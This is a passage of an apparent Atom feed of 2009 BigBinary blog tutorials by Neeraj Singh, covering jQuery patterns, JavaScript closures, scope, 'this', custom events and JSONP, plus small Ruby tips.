after: -ambiguous_newline</code></pre><p>Also I had to comment out <code>+process jsl-test.js</code> at the very bottom. Now tell the plugin to use this configuration file rather than the default one, by adding the following line to your vimrc file.</p><pre><code class="language-plaintext">let jslint_command_options = '-conf &quot;/Users/neeraj/vim/plugin/jslint/jsl.custom.conf&quot; -nofilelisting -nocontext -nosummary -nologo -process'</code></pre><p><a href="http://github.com/neerajsingh0101/vim/tree/master">These are the vim settings</a> I use, and they have been configured to take care of this. Just go to <code>vimrc.local</code> and change the path to your config file. 
Also don't forget to remove the <code>&quot;</code> at the beginning of the line to uncomment it.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Wrapping functions with self invoking jQuery]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/wrap-your-function-with-self-invoking-jquery-instead-of-performing-find-replace"/>
      <updated>2009-09-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/wrap-your-function-with-self-invoking-jquery-instead-of-performing-find-replace</id>
<content type="html"><![CDATA[<p><em>Following code is tested with jQuery 1.3.</em></p><p>I have the following code which depends on jQuery.</p><pre><code class="language-javascript">var Search = {
  initAction: function ($elm) {
    if ($elm.attr(&quot;value&quot;).length === 0) {
      $elm.attr(&quot;value&quot;, &quot;search&quot;);
    }
  },
  blurAction: function ($elm) {
    if ($elm.attr(&quot;value&quot;) === &quot;search&quot;) {
      $elm.attr(&quot;value&quot;, &quot;&quot;);
    }
  },
};
Search.initAction($(&quot;#query_term_input&quot;));
Search.blurAction($(&quot;#query_term_input&quot;));</code></pre><p>Everything is cool.</p><p>Next, the company decides to use a cool JavaScript widget that depends on the Prototype library. After adding the Prototype library my code starts failing, and I have been asked to fix it.</p><p>I could obviously go through the code and do a mass find-and-replace of <code>$</code> with <code>jQuery</code>. This is error prone.</p><p>A better solution would be to make use of a <a href="understanding-jquery-plugin-pattern-and-self-invoking-javascript-function">self invoking function</a> and redefine <code>$</code> as <code>jQuery</code>.</p><pre><code class="language-javascript">var Search = (function ($) {
  return {
    initAction: function ($elm) {
      if ($elm.attr(&quot;value&quot;).length === 0) {
        $elm.attr(&quot;value&quot;, &quot;search&quot;);
      }
    },
    blurAction: function ($elm) {
      if ($elm.attr(&quot;value&quot;) === &quot;search&quot;) {
        $elm.attr(&quot;value&quot;, &quot;&quot;);
      }
    },
  }; // return
})(jQuery);
Search.initAction(jQuery(&quot;#query_term_input&quot;));
Search.blurAction(jQuery(&quot;#query_term_input&quot;));</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Understanding this in Javascript object literal]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/understanding-this-in-javascript-object-literal"/>
      <updated>2009-08-06T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/understanding-this-in-javascript-object-literal</id>
<content type="html"><![CDATA[<p>Here is some code.</p><pre><code class="language-javascript">var foo = {
  first: function () {
    console.log(&quot;I am first&quot;);
  },
  second: function () {
    console.log(&quot;I am second&quot;);
  },
};
foo.first();
foo.second();</code></pre><p>Everything works fine.</p><p>Now there is a need for function <code>second</code> to call function <code>first</code>. Try this and it will fail.</p><pre><code class="language-javascript">var foo = {
  first: function () {
    console.log(&quot;I am first&quot;);
  },
  second: function () {
    console.log(&quot;I am second&quot;);
    first();
  },
};
foo.second();</code></pre><p>One way to fix this problem is to hardcode the name <code>foo</code> inside the <code>second</code> function. The following code works.</p><pre><code class="language-javascript">var foo = {
  first: function () {
    console.log(&quot;I am first&quot;);
  },
  second: function () {
    console.log(&quot;I am second&quot;);
    foo.first();
  },
};
foo.second();</code></pre><p>The above code works, but hardcoding the name <code>foo</code> inside the object literal is not good. A better way is to replace the hardcoded name with <code>this</code>.</p><pre><code class="language-javascript">var foo = {
  first: function () {
    console.log(&quot;I am first&quot;);
  },
  second: function () {
    console.log(&quot;I am second&quot;);
    this.first();
  },
};
foo.second();</code></pre><p>All is good.</p><h2>Chasing this</h2><p>JavaScript allows you to create a function inside a function. Now I am changing the implementation of the method <code>second</code>. 
Now this method will return another function.</p><pre><code class="language-javascript">var foo = {
  first: function () {
    console.log(&quot;I am first&quot;);
  },
  second: function () {
    return function () {
      this.first();
    };
  },
};
foo.second()();</code></pre><p>Also note that in order to invoke the returned function there is a double <code>()()</code> at the end.</p><p>The above code does not work, because <code>this</code> has changed. <code>this</code> inside the returned function refers to the global object rather than to the <code>foo</code> object.</p><p>The fix is simple. In the function <code>second</code>, store the value of <code>this</code> in a temporary variable and have the inner function use that variable. This solution works because of JavaScript's support for closures.</p><pre><code class="language-javascript">var foo = {
  first: function () {
    console.log(&quot;I am first&quot;);
  },
  second: function () {
    var self = this;
    return function () {
      self.first();
    };
  },
};
foo.second()();</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[jQuery custom events]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/jquery-custom-events"/>
      <updated>2009-07-31T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/jquery-custom-events</id>
<content type="html"><![CDATA[<p><em>Following code has been tested with jQuery 1.3.</em></p><p>JavaScript is all about interactions. When an event happens, something should happen in response. For example hover, click, focus and mouseover are basic events which are used on a regular basis. jQuery provides a method called <a href="http://docs.jquery.com/Events/bind#typedatafn">bind</a> to bind an action to an event. For example, if we want an alert message when we click on a link, that can be done like this.</p><pre><code class="language-javascript">$(&quot;a&quot;).bind(&quot;click&quot;, function () {
  alert(&quot;I have been clicked&quot;);
});</code></pre><p>jQuery also allows developers to make use of custom events. How that is going to help us, we will see shortly. First let's take a look at a basic calendar application.</p><p>This is a simple JavaScript calendar which primarily does four things: render the calendar itself, pull data from an API and update the calendar with it, collapse event information, and expand event information.</p><p>The code looks like this.</p><pre><code class="language-javascript">function redrawForMonth(d) {
  //business logic to render calendar
  $(&quot;#monthly_calendar_umbrella&quot;).updateCalendarWithAPIData();
  $(&quot;#monthly_calendar_umbrella&quot;).ExpandAllEvents();
}
function updateCalendarWithAPIData() {
  //business logic to get the data from API and appending data to appropriate date cell
}
function CollapseAllEvents() {
  //business logic
}
function ExpandAllEvents() {
  //business logic
}</code></pre><p>In the above case we have four methods. 
If all the implementation is filled out and helper methods are added then, in total, we'll have tons of methods.</p><p>And slowly, it'll become difficult to see which methods act on the main element <code>monthly_calendar_umbrella</code>.</p><p>Let's look at the same functionality implemented using jQuery custom events.</p><pre><code class="language-javascript">$(&quot;#monthly_calendar_umbrella&quot;)
  .bind(&quot;redrawForMonth&quot;, function (e, d) {})
  .bind(&quot;updateCalendarWithAPIData&quot;, function (e, d) {})
  .bind(&quot;CollapseAllEvents&quot;, function (e) {})
  .bind(&quot;ExpandAllEvents&quot;, function (e) {});</code></pre><p>The first difference you will notice is how nicely all the actions possible on the main element are laid out. In this case just one look at the code tells me that four actions can be performed on the main element. This was not so obvious from the first version of the code.</p><p>In this case, I am binding events such as 'redrawForMonth' to the element. Obviously 'redrawForMonth' is not a native event such as 'click' or 'submit'. This is what I mean by binding 'custom events' to elements. In this case 'redrawForMonth' is a custom event.</p><p>The other thing that is not so obvious is the shift in focus. Traditional javascript programming has been too obsessed with the element that is clicked or submitted, the element that causes an action. The emphasis has been on keeping the code around the element that triggers an action. In this case the code has been developed around the element that is being acted upon.</p><p>Now, the last part of the discussion is how to trigger custom events. jQuery has a method called <a href="http://docs.jquery.com/Events/trigger#eventdata">trigger</a>.</p><p>Note that while binding, a function is passed. The first parameter of that function is always an event object. 
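Outside of jQuery, the bind/trigger pair behaves like a small publish/subscribe registry. Here is a minimal plain-javascript sketch of the idea (the EventBus name and its methods are my own and are not part of jQuery):

```javascript
// A tiny sketch of jQuery-style custom events: handlers are stored per
// event name, and trigger() calls each handler with an event object
// followed by any extra data.
function EventBus() {
  this.handlers = {};
}
EventBus.prototype.bind = function (name, fn) {
  (this.handlers[name] = this.handlers[name] || []).push(fn);
  return this; // allow chaining, like jQuery
};
EventBus.prototype.trigger = function (name, data) {
  var event = { type: name };
  (this.handlers[name] || []).forEach(function (fn) {
    fn(event, data);
  });
  return this;
};

var calendar = new EventBus();
calendar.bind("redrawForMonth", function (e, d) {
  console.log("redrawing calendar for " + d);
});
calendar.trigger("redrawForMonth", "July 2009");
```

The sketch only illustrates the dispatch mechanism; jQuery additionally scopes events to DOM elements and supports namespaces and bubbling.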
In the below example I am passing only one parameter even though the bound function takes two: the event object and the parameter I defined.</p><pre><code class="language-javascript">$(&quot;#monthly_calendar_umbrella&quot;).trigger(&quot;redrawForMonth&quot;, new Date());</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[jQuery base code to create a jQuery plugin]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/jquery-base-code-to-create-a-jquery-plugin"/>
      <updated>2009-07-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/jquery-base-code-to-create-a-jquery-plugin</id>
      <content type="html"><![CDATA[<p><em>The following code has been tested with jQuery 1.3.</em></p><p>Recently I was discussing with a friend how to create a jQuery plugin. In the end I had some base code that should work as a starting point for any jQuery plugin.</p><p><a href="http://gist.github.com/154375">Take a look</a> here.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Inspecting jQuery internals and storing information]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/jquery-data-for-inspecting-jquery-internals-and-for-storing-information"/>
      <updated>2009-07-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/jquery-data-for-inspecting-jquery-internals-and-for-storing-information</id>
      <content type="html"><![CDATA[<p>The following code has been tested with jQuery 1.3.</p><p>Let's say that I have bound all the links to display an alert.</p><pre><code class="language-javascript">$(&quot;a&quot;).bind(&quot;click&quot;, function (e) {
  e.preventDefault();
  alert(&quot;clicked&quot;);
});</code></pre><p>Mine is a large application, and a co-worker has added another javascript file which does this.</p><pre><code class="language-javascript">$(&quot;a&quot;).bind(&quot;click&quot;, function (e) {
  e.preventDefault();
  alert(&quot;hello&quot;);
});</code></pre><p>Now if I click on a link I get two alerts. Not good. One way to debug would be to go through all the included javascript files.</p><p>However, it would be cool if there were a way to find all the click handlers associated with an element.</p><p>jQuery has a <a href="http://docs.jquery.com/Internals/jQuery.data">data method</a> which it uses internally to store information, including all the handlers associated with an element. We can use this information to our advantage. Here I am trying to find all the click handlers associated with the first link.</p><pre><code class="language-javascript">var output = jQuery.data($(&quot;a&quot;).get(0), &quot;events&quot;);
jQuery.each(output.click, function (key, value) {
  alert(value);
});</code></pre><p>The output looks like this.</p><pre><code class="language-javascript">function (e) { e.preventDefault(); alert(&quot;clicked&quot;); }
function (e) { e.preventDefault(); alert(&quot;hello&quot;); }</code></pre><p>The jQuery.data method is also very useful if you want to store some information about an element yourself. For example, suppose an application needs to store information about people. The html page displays only names, and when a name is clicked you want to display the person's age, hometown and the company they work for. You can store that information with jQuery.data and retrieve it when the name is clicked.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Event propagation and preventDefault]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/event-propagation-and-peventdefault"/>
      <updated>2009-07-20T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/event-propagation-and-peventdefault</id>
      <content type="html"><![CDATA[<p>Let's look at some sample html.</p><pre><code class="language-html">&lt;div id=&quot;parent&quot;&gt;
  Languages
  &lt;p&gt;Java&lt;/p&gt;
  &lt;p&gt;Javascript&lt;/p&gt;
&lt;/div&gt;</code></pre><p>And here is the javascript code. Run the code with jQuery 1.3.2.</p><pre><code class="language-javascript">$(document).ready(function () {
  $(&quot;#parent&quot;).click(function () {
    alert(&quot;parent was clicked&quot;);
  });
  $(&quot;#parent p&quot;).click(function () {
    alert(&quot;p was clicked&quot;);
  });
});</code></pre><p>When you click on <code>Java</code> you will get two alerts. That is because the click on the p element propagates outward and is caught by the div element, which has a click handler.</p><p>If you do not want the event to propagate, here is a way to stop it.</p><pre><code class="language-javascript">$(document).ready(function () {
  $(&quot;#parent&quot;).click(function () {
    alert(&quot;parent was clicked&quot;);
  });
  $(&quot;#parent p&quot;).click(function (e) {
    alert(&quot;p was clicked&quot;);
    e.stopPropagation();
  });
});</code></pre><h2>Stopping the default behavior</h2><p>Converting a regular html link into an AJAX request is easy. One of the things you need to do is <code>return false</code> so that the click does not perform its default behavior.</p><pre><code class="language-javascript">$(&quot;a&quot;).bind(&quot;click&quot;, function () {
  alert(&quot;clicked&quot;);
  return false;
});</code></pre><p>However, there is another way to handle such cases: <code>preventDefault</code> stops the default behavior. The same code could be written as</p><pre><code class="language-javascript">$(&quot;a&quot;).bind(&quot;click&quot;, function (e) {
  e.preventDefault();
  alert(&quot;clicked&quot;);
});</code></pre><p><em>Not sure why, but I have noticed that e.preventDefault() should be the first line in the function. 
If I switch the order of e.preventDefault and the alert message in the above javascript, it does not work in Firefox on the Mac</em>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[What is JSONP?]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/what-is-jsonp"/>
      <updated>2009-07-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/what-is-jsonp</id>
      <content type="html"><![CDATA[<p><em>This is part II of How to create dynamic javascript widget (link is not available).</em></p><h2>What problem does JSONP solve?</h2><p>Browsers do not allow cross-domain Ajax requests. For example, if you try to make an Ajax request to http://www.eventsinindia.com/events/14633.js to get event data, you will get the following error.</p><pre><code class="language-plaintext">Access to restricted URL denied.</code></pre><p>To get around this security restriction you can do any number of things, including sending the Ajax request to your own server, which then gets the JSON data from the eventsinindia.com API. Or you can use an iframe. Both of these solutions are implemented and discussed in <a href="http://www.neeraj.name/blog/articles/846">this article</a>.</p><p>However, in some cases JSONP solves this problem much more elegantly.</p><h2>Some basics before we discuss JSONP</h2><p>Before looking at JSONP let's cover some basics. When an html page includes a javascript file, the html code looks something like this.</p><pre><code class="language-plaintext">&lt;script src=&quot;http://neeraj.name/javascripts/color.js&quot; type=&quot;text/javascript&quot;&gt;&lt;/script&gt;</code></pre><p>There are two things to notice here. First, the source of the javascript file can be cross-domain. It means your html page can point the source of a javascript file to <code>http://neeraj.name/javascripts/cache/all.js</code> and all.js will be loaded by the browser. This feature, which allows cross-domain loading of javascript files, is the basis of JSONP.</p><p>The second thing to notice is that the javascript written in color.js is immediately evaluated after the source file has been loaded. 
For example, the content of color.js could be this.</p><pre><code class="language-javascript">alert(&quot;hello&quot;);</code></pre><p>When the html page is loaded you will get an alert.</p><p>Let's recap: in the above section I showed you how you can point the source of a javascript file to a domain that is not yours (cross-domain), and the code loaded from that domain is immediately evaluated.</p><h2>What is JSONP?</h2><p>From the above section it is clear that if by some means we could dynamically create a <code>script node</code>, point its source to a cross-domain URL, and have the remote site return a javascript function call, then that call will be evaluated.</p><p>However, in the world of JSON we only get JSON data from the remote server. If we want to stick the returned JSON data on our page, that data needs to be used by a javascript function. And that's where JSONP comes in handy.</p><p>Let's take an example. If you make a call to http://www.eventsinindia.com/events/14633.js you will get JSON data back.</p><pre><code class="language-javascript">{&quot;name&quot;: &quot;Craft Classes&quot; , &quot;start_date&quot;: &quot;2009-05-01&quot; , ....}</code></pre><p>However, what you really want is to stick this data on your html page by invoking a javascript function like this.</p><pre><code class="language-javascript">AddThisDataToPage({&quot;name&quot;: &quot;Craft Classes&quot; , &quot;start_date&quot;: &quot;2009-05-01&quot; , ....});</code></pre><p>What needs to be done is, while making a call to http://www.eventsinindia.com/events/14633.js, pass a parameter called <code>callback</code>. In this case the full url would look something like this.</p><pre><code class="language-plaintext">http://www.eventsinindia.com/events/14633.js?callback=AddThisDataToPage</code></pre><p>Remember, callback is a special word here. 
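What the server does with the callback parameter can be sketched in a few lines. This is an illustrative sketch, not code from the post; the function name wrapAsJsonp is my own:

```javascript
// Sketch of what a JSONP-enabled endpoint does: with no callback
// requested it returns plain JSON, otherwise it wraps the serialized
// data in a call to the named function.
function wrapAsJsonp(data, callbackName) {
  var json = JSON.stringify(data);
  if (!callbackName) return json;
  return callbackName + "(" + json + ");";
}

console.log(wrapAsJsonp({ name: "Craft Classes" }, null));
console.log(wrapAsJsonp({ name: "Craft Classes" }, "AddThisDataToPage"));
```

A real endpoint would also set an appropriate content type and validate the callback name, but the wrapping itself is this simple.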
By using callback we are telling the API to wrap the response JSON data in a call to a function named AddThisDataToPage.</p><p>Click on the following two links to see the difference. The first link returns pure JSON data, while the second returns a javascript function call.</p><p>http://www.eventsinindia.com/events/14633.js</p><p>http://www.eventsinindia.com/events/14633.js?callback=AddThisDataToPage</p><h2>Using JSONP with jQuery</h2><p>jQuery makes it easy to use JSONP. The documentation on how to use JSONP with jQuery is <a href="http://docs.jquery.com/Ajax/jQuery.getJSON#overview">here</a>.</p><h2>Callback is not the name everyone uses</h2><p>Most people use <code>callback</code> as the keyword to indicate that the client is asking for JSONP data. However, some people use a different keyword. For example, flickr uses the keyword <code>jsoncallback</code>.</p><p>This returns JSON data.</p><p><a href="http://api.flickr.com/services/feeds/photos_public.gne?tags=cat&amp;tagmode=any&amp;format=json">http://api.flickr.com/services/feeds/photos_public.gne?tags=cat&amp;tagmode=any&amp;format=json</a></p><p>In this case callback is being passed, but flickr ignores it.</p><p><a href="http://api.flickr.com/services/feeds/photos_public.gne?tags=cat&amp;tagmode=any&amp;format=json&amp;callback=show">http://api.flickr.com/services/feeds/photos_public.gne?tags=cat&amp;tagmode=any&amp;format=json&amp;callback=show</a></p><p>In this case the callback is passed with the name jsoncallback, which flickr honors.</p><p><a href="http://api.flickr.com/services/feeds/photos_public.gne?tags=cat&amp;tagmode=any&amp;format=json&amp;jsoncallback=show">http://api.flickr.com/services/feeds/photos_public.gne?tags=cat&amp;tagmode=any&amp;format=json&amp;jsoncallback=show</a></p><h2>Providing support for JSONP</h2><p>All APIs should provide support for JSONP. Enabling JSONP support is easy if you are using Rails 2.3 or any Rack-compliant framework. 
In Rails 2.3 all you need to do is stick this file in lib as jsonp.rb (link is not available) and then add one line to environment.rb.</p><pre><code class="language-ruby"># environment.rb
Rails::Initializer.run do |config|
  .....
  config.middleware.use 'Jsonp'
end</code></pre><p>That's it. Now you are providing support for JSONP, with the keyword being <code>callback</code>.</p><h2>Security</h2><p>Since data from an external source is read and then evaluated at run time by Javascript, there is potential for a security breach. So be careful when you are using JSONP. Only load data from a trusted source.</p>]]></content>
    </entry><entry>
       <title><![CDATA[$stdout.sync = true to flush output immediately]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/stdout-sync-true-to-flush-output-immediately"/>
      <updated>2009-07-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/stdout-sync-true-to-flush-output-immediately</id>
      <content type="html"><![CDATA[<p>Try this.</p><pre><code class="language-ruby">5.times do
  putc('.')
  sleep(2)
end</code></pre><p>I was hoping to get a dot every two seconds. But that's not what happens when you run the code: I see nothing for the first 10 seconds, then I see five dots in one shot. This is not what I wanted.</p><p>I started looking around in the documentation for the IO class and found the method <a href="http://www.ruby-doc.org/core/classes/IO.html#M002263">sync=</a> which, if set to true, flushes all output immediately to the underlying operating system.</p><p>The reason output is not flushed immediately is to minimize IO operations, which are usually slow. However, in this case you are asking Ruby not to buffer and to flush the output immediately.</p><pre><code class="language-ruby">$stdout.sync = true

5.times do
  putc('.')
  sleep(2)
end</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Functional scope in Javascript]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/functional-scope-in-javascript-and-how-javascript-continues-to-surprise-me"/>
      <updated>2009-06-30T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/functional-scope-in-javascript-and-how-javascript-continues-to-surprise-me</id>
      <content type="html"><![CDATA[<p>Javascript continues to surprise me. Check out this code.</p><pre><code class="language-javascript">function foo() {
  var x = 100;
  alert(x);
  for (var x = 1; x &lt;= 10; x++) {}
  alert(x);
}
foo();</code></pre><p>What do you think the value of the second alert will be? I thought it would be 100, but the answer is 11. That's because the scope of a local variable in Javascript is not limited to the loop. Rather, the scope of a local variable is the entire function.</p><p>Before you look at the next piece of code, remember that defining a variable without the <code>var</code> prefix makes it a global variable.</p><pre><code class="language-javascript">fav_star = &quot;Angelina&quot;; /* it is a global variable */
function foo() {
  var message = &quot;fav star is &quot; + fav_star;
  alert(message);
  var fav_star = &quot;Jennifer&quot;;
  var message2 = &quot;fav star is &quot; + fav_star;
  alert(message2);
}
foo();</code></pre><p>What do you think the first alert value will be? I thought it would be <code>Angelina</code>, but the correct answer is <code>undefined</code>. That is because it does not matter where within the function the variable is declared: if a variable is declared anywhere within a function, it is hoisted and set to <code>undefined</code> at the start of the function. Only when the assignment statement executes does the value change from <code>undefined</code> to <code>Jennifer</code>.</p><p>Thanks to my friend Subba Rao for bringing this feature of Javascript to my attention and for discussing it.</p>]]></content>
    </entry><entry>
       <title><![CDATA[JS tip - Avoiding polluting the global namespace]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/javascript-tip-do-not-pollute-global-namespace-with-utility-functions"/>
      <updated>2009-03-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/javascript-tip-do-not-pollute-global-namespace-with-utility-functions</id>
      <content type="html"><![CDATA[<p>I am learning Javascript, and as I do more Javascript work I am learning not only the language but also the best practices. Today I am developing a Javascript calendar. In the process of creating the calendar I created a bunch of utility functions that live in the global namespace.</p><h2>What are we talking about</h2><p>My main concern is that as a Javascript developer I should not be polluting the global namespace. I could write the calendar code like this.</p><pre><code class="language-javascript">showCalendar = function (options, d) {};
calendarHeaderMonth = function (opts) {};
calendarHeaderWeek = function (opts) {};
calendarData = function (opts) {};
drawCalendar = function (opts, d) {};
getCellID = function (year, month, day) {};

// use showCalendar
showCalendar({}, new Date());</code></pre><p>You can see that the main method that I want to expose to the global namespace is <code>showCalendar</code>. However, I am also exposing five other functions to the global namespace. It means that if some user has declared a global function named <code>getCellID</code>, then my <code>getCellID</code> is going to collide with the user's function. This is not good.</p><h2>Goal</h2><p>The goal is to refactor the code in such a way that only one method, <code>showCalendar</code>, is exposed to the global namespace. To test the code, at the very end of the javascript I will invoke the method <code>getCellID</code>.</p><pre><code class="language-javascript">showCalendar = function (options, d) {};
calendarHeaderMonth = function (opts) {};
calendarHeaderWeek = function (opts) {};
calendarData = function (opts) {};
drawCalendar = function (opts, d) {};
getCellID = function (year, month, day) {};

// use showCalendar
showCalendar({}, new Date());

// this call should fail but is not failing now
getCellID(2009, 5, 4);</code></pre><p>The above call to <code>getCellID</code> is currently executed successfully. It means I have polluted the global namespace. 
I am going to fix that.</p><h2>Solution</h2><p>The solution is to put all the code inside a function. All the variables and functions declared in a function are scoped only to that function; outside of it, the inner functions cannot be used. Inside this function only one method, <code>showCalendar</code>, will be exposed.</p><p>Here is the solution.</p><pre><code class="language-javascript">(function () {
  // by not declaring it with var, this variable is going to be at global namespace
  showCalendar = function (options, d) {};

  var calendarHeaderMonth = function (opts) {};
  var calendarHeaderWeek = function (opts) {};
  var calendarData = function (opts) {};
  var drawCalendar = function (opts, d) {};
  var getCellID = function (year, month, day) {};
})();

showCalendar({}, new Date());

// this call will fail
getCellID(2009, 5, 4);</code></pre><p>In the above case the call to <code>showCalendar</code> succeeds. However, the call to <code>getCellID</code> fails. That's good. It means I am not polluting the global namespace.</p><p>If you look carefully, in the above case after declaring an anonymous function I am invoking it by adding <code>()</code> at the end. You can read more about <a href="understanding-jquery-plugin-pattern-and-self-invoking-javascript-function">self-invoking functions here</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Usage of Closure in Javascript]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/usage-of-closure-in-javascript"/>
      <updated>2009-03-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/usage-of-closure-in-javascript</id>
      <content type="html"><![CDATA[<p>In this article you are going to see what you can do with the power of closures in Javascript. This is not an article about what a closure is; it is an article about what closures can do. I see a lot of people asking what the big deal with closures is. They want more real-world cases where closures make sense.</p><h2>Example 1: Getting digit name</h2><p>The goal is to read from an array and display the result. The first implementation is to put everything in the global namespace.</p><pre><code class="language-javascript">var names = [&quot;zero&quot;, &quot;one&quot;, &quot;two&quot;, &quot;three&quot;, &quot;four&quot;, &quot;five&quot;];
var digit_name = function (n) {
  return names[n];
};
alert(digit_name(3)); // 'three'</code></pre><p>The above solution works. However, creating a global variable <code>names</code> is not a good thing. You should create as few global variables as possible.</p><h2>Moving to a function</h2><p>The next step is to move the code into a function. In this case we will not have any global variable.</p><pre><code class="language-javascript">var digit_name = function (n) {
  var names = [&quot;zero&quot;, &quot;one&quot;, &quot;two&quot;, &quot;three&quot;, &quot;four&quot;, &quot;five&quot;];
  return names[n];
};
alert(digit_name(3));</code></pre><p>The above solution is slow: every single time the function is called, the whole array is created again. This solution works, and most developers will settle for it. However, a closure can provide a better solution.</p><h2>Better solution with Closure</h2><pre><code class="language-javascript">var digit_name = (function () {
  var names = [&quot;zero&quot;, &quot;one&quot;, &quot;two&quot;, &quot;three&quot;, &quot;four&quot;, &quot;five&quot;];
  return function (n) {
    return names[n];
  };
})();
alert(digit_name(3));</code></pre><p>Note that after being declared, the function is also immediately invoked. This is a case of a self-invoking function. 
You can find out more about self-invoking functions <a href="understanding-jquery-plugin-pattern-and-self-invoking-javascript-function">here</a>.</p><h2>Example 2: Getters and Setters</h2><p>Developers deal with getters and setters all the time. However, creating a good getter and setter can be a little tricky. Here is one implementation.</p><pre><code class="language-javascript">function Field(val) {
  var value = val;
  this.getValue = function () {
    return value;
  };
  this.setValue = function (val) {
    value = val;
  };
}
var field = new Field(&quot;test&quot;);
field.value; // =&gt; undefined
field.setValue(&quot;test2&quot;);
field.getValue(); // =&gt; &quot;test2&quot;</code></pre><p>The above solution works, and it's nicely done: the <code>value</code> variable stays private, and only the getter and setter can reach it.</p><p>Let's look at another implementation.</p><pre><code class="language-javascript">var getValue, setValue;
(function () {
  var secret = 0;
  getValue = function () {
    return secret;
  };
  setValue = function (v) {
    secret = v;
  };
})();
setValue(&quot;foo&quot;);
getValue(); // foo</code></pre><h2>Example 3: Building an iterator using Javascript</h2><pre><code class="language-javascript">function custom_iterator(x) {
  var i = 0;
  return function () {
    return x[i++];
  };
}
var next = custom_iterator([&quot;one&quot;, &quot;two&quot;, &quot;three&quot;, &quot;four&quot;]);
next(); // &quot;one&quot;
next(); // &quot;two&quot;
next(); // &quot;three&quot;</code></pre><p>This is a simple case of serially iterating through the items provided, but the logic for deciding the next element can be complex, and it can stay private.</p><p>Closures are a big topic and a lot of people have written a lot about them. Just search for closures and you will get tons of links. 
I refer to this article from time to time to see which patterns make the best use of Javascript closures.</p><p>This article was inspired by <a href="http://www.amazon.com/Object-Oriented-JavaScript-high-quality-applications-libraries/dp/1847194141">this book</a>, <a href="http://www.youtube.com/watch?v=hQVTIJBZook">this video</a> and <a href="http://ejohn.org/blog/javascript-getters-and-setters">this article</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[jQuery Plugin Pattern & self-invoking javascript function]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/understanding-jquery-plugin-pattern-and-self-invoking-javascript-function"/>
      <updated>2009-03-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/understanding-jquery-plugin-pattern-and-self-invoking-javascript-function</id>
      <content type="html"><![CDATA[<p>I am learning jQuery, and one of the things I was struggling with is the plugin pattern. In the jQuery world it is very common to wrap the major functionality of an application inside a plugin.</p><p><a href="https://www.learningjquery.com/2007/10/a-plugin-development-pattern">Here is a great article</a> which describes in detail how to wrap your javascript code inside a jQuery plugin. The article does a great job of explaining the basics; however, it took me a while to understand self-invoking functions.</p><h2>Self-invoking functions</h2><p>Self-invoking functions are anonymous functions that are declared at run time and invoked right then and there. Since they are anonymous, they can't be invoked twice. However, they are a good candidate for initialization work, which is exactly what is happening in the jQuery plugin pattern.</p><h2>Declaring a function</h2><p>A function can be declared in two ways:</p><pre><code class="language-javascript">function hello() {
  alert(&quot;Hello&quot;);
}

var hello = function () {
  alert(&quot;Hello&quot;);
};</code></pre><p>The end result of the above two javascript statements is the same: a variable named hello is created, and it is a function.</p><p>Please note that in the above case the functions are only declared; they are not invoked. In order to invoke the function we have to do this.</p><pre><code class="language-javascript">var hello = function () {
  alert(&quot;Hello&quot;);
};
hello();</code></pre><p>How do we invoke an anonymous function? We need to call () on the anonymous function, but before that we need to wrap the whole declaration in (). 
Take a look at this.</p><pre><code class="language-javascript">// original
function hello() {
  alert(&quot;Hello&quot;);
}

// step 1: wrap everything in () so that we have a context to invoke
(function hello() {
  alert(&quot;Hello&quot;);
});

// step 2: now call () to invoke this function
(function hello() {
  alert(&quot;Hello&quot;);
})();</code></pre><p>The final result is weird-looking code, but it works, and that is how an anonymous function is declared and invoked at run time.</p><p>With this understanding it becomes easier to see what is happening in this code.</p><pre><code class="language-javascript">(function ($) {
  // ....
})(jQuery);</code></pre><p>In the above case an anonymous function is being created. However, unlike my earlier anonymous function, this one takes a parameter, and the name of this parameter is $. $ is nothing but the jQuery object, which is passed in while invoking the function.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Determining if commits are executed in a transaction]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/how-to-find-if-my-commits-are-executed-in-a-transaction-or-not"/>
      <updated>2009-03-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-to-find-if-my-commits-are-executed-in-a-transaction-or-not</id>
      <content type="html"><![CDATA[<pre><code class="language-ruby">ActiveRecord::Base.connection.supports_ddl_transactions?</code></pre>]]></content>
    </entry><entry>
